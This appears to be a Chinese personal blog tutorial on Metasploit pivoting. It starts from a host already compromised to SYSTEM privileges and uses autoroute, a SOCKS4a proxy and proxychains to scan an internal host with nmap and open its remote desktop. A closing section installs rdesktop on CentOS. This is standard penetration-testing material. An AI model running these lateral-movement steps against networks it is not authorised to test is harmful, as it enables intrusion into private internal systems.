【内网穿透】metasploit跨路由进内网

前言

  • metasploit 通过增加路由来扫描对应端口

路由方式进内网

首先提权到了system权限

1、看有几个网段

1
run get_local_subnets

image-20210825101511830

2、增加一个网段的路由

1
2
3
4
run autoroute -s 192.168.0.0/24

// 查看当前路由
run autoroute -p

image-20210825101832048

3、保存sessions然后记住id,接着创建一个socks4a代理

1
use auxiliary/server/socks_proxy

image-20210825102647725

接着将VERSION设置为4a

1
set VERSION 4a

接着直接run,就成功设置了1080端口socks4a协议

image-20210825102726771

4、设置4a代理,利用proxychains4

1
vim /etc/proxychains.conf //设置ip地址

image-20210825102931404

接着就可以利用proxychains直接访问192.168.0.111的内网

1
proxychains4 nmap -sT -Pn -v 192.168.0.111

image-20210825103302020

接着当我们找出3389端口的密码之后,可以直接利用rdesktop来连接3389的远程桌面,xshell会自动帮你开启桌面窗口

1
proxychains4 rdesktop 192.168.0.111 //-g 1980*1080 这是调整分辨率的 -f 表示全屏

image-20210825105439505

这里说一点坑,由于我公网服务器并不是kali,只是centos的系统,所以需要安装rdesktop来进行远程登录

安装rdesktop

1、下载仓库文件

1
wget http://li.nux.ro/download/nux/dextop/el7/x86_64/nux-dextop-release-0-5.el7.nux.noarch.rpm

2、安装仓库

1
rpm -Uvh nux-dextop-release-0-5.el7.nux.noarch.rpm

3、安装远程桌面程序

1
yum install rdesktop -y

完成!

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【内网穿透】metasploit跨路由进内网

文章作者:孤桜懶契

发布时间:2021年08月25日 - 10:12:36

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/113.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------